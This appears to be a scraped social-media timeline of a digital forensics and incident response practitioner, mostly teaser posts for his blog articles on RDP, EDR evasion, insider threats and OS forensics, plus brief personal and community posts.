Mathias Fuchs

Attackers love RDP for sneaky lateral moves—but every pixel leaves a clue! 🕵️‍♂️ Check out my latest blog on tracking attackers through logs, bitmap caches, and clipboard trails (plus a printer tale too funny to miss). #DFIR #BlueTeam #CyberSecurity medium.com/@mathias.fuchs…

🗓 Logs lie. Prefetch tattles. ShimCache whispers. Timestamps dance. Building timelines in DFIR isn’t just science—it’s chaos theory in action. Join me in taming Chronos: medium.com/@mathias.fuchs… #DFIR #IncidentResponse #CyberSecurity

🚨 Bob from Accounting could be your biggest cyber threat. Seriously. 83% of orgs saw insider attacks last year. Tesla sabotage, Snowden leaks—your office has never felt spookier. Read how to spot & stop these insider rogues 👉medium.com/@mathias.fuchs… #CyberSecurity #InsiderThreat

🕵️‍♂️ How do attackers ghost past your EDR? New blog post dives deep into evasion tricks—LOLBins, memory games, syscall magic & more. Time to up your detection game! 👻🔍 👉 medium.com/@mathias.fuchs…

Tier 1 SOC Analysts: Highest responsibility, least experience, infinite alerts—what could go wrong? Plenty. Find out how automation and AI could save your analysts' sanity (and yours). ☕️🤖 #CyberSecurity #SOC #AI medium.com/@mathias.fuchs…

Choosing an IR partner = Picking a parachute packer. 🪂 Know your red flags 🚩, must-haves ✅, and absolute no-gos ❌ before you're in free-fall. Dive into my latest blog 👉 medium.com/@mathias.fuchs… #CyberSecurity #IncidentResponse #DFIR #CISO

Last week: macOS forensics (easy!). This week: Linux forensics (not easy at all!). Ever wondered why Linux is tougher than Windows forensics? Scripts, logs, chaos! ☕🐧 #DFIR #Linux #CyberSecurity medium.com/@mathias.fuchs…

Think Mac forensics is harder than Windows? Think again. 🍏 Unified logs, fewer artifacts, built-in snapshots—macOS might be easier for DFIR. Except memory. That’s still hell. 🔥 Full deep dive for IR pros here 👉 medium.com/@mathias.fuchs… #DFIR #macOS #forensics #cybersecurity

🛡️ Microsoft's new ReFS filesystem is changing the rules of digital forensics & IR. NTFS artifacts are evolving—are you ready? Read our deep dive here: medium.com/@mathias.fuchs… #DFIR #ReFS #CyberSecurity #IncidentResponse #Forensics

Even the best responders can’t work miracles in the dark. 🔍 Why visibility is everything in incident response – and what EDRs & network monitoring don't tell you. Read the blog 👉 medium.com/@mathias.fuchs… #DFIR #CyberSecurity #IncidentResponse #Velociraptor

Brilliant!

🎉 Congrats to @mathias_fuchs on being promoted to #SANS Senior Instructor! Mat is an instructor for #FOR508 & #FOR608. Congrats again, Mat! We are so lucky to have you be an instrumental part of the #DFIR curriculum! 👏 Learn more about Mat, here: sans.org/profiles/mathi…

What the hell is going on at @ContaboCom. Total outage of my servers. Only daily updates on the issue are not acceptable. I'll move my stuff to somewhere else.

I can see how users fall for that, but 5 vendors classify it ok too, including security vendors. That domains quite a s*hole forwarder. We observed that the site forwarded to one distributing magniber ransomware.

Thank @shortxstack , your contributions are always great!

Does anyone have information on how Amazon will deal with the Digital Market Act specifically regarding their Echo Show 15 devices. They went to great lengths about a year ago to prevent side loading. Now I guess they are required to lift that ban again.

I'm getting messages that my Memory FOR532 Class has gone - it was discontinued by SANS. I'll run an updated version of the class later this year on my own server. Thanks to @sansforensics for offering it for the last 1.5 years and to all the students and their valued feedback.

Received shocking news from @uniinnsbruck during(!) my Antarctic expedition: Despite having secured funding, I'm barred from working at the university soon. Heartless timing, and it jeopardizes scientific career. No lab access = no sample processing or publishing. Plz RT this 🧵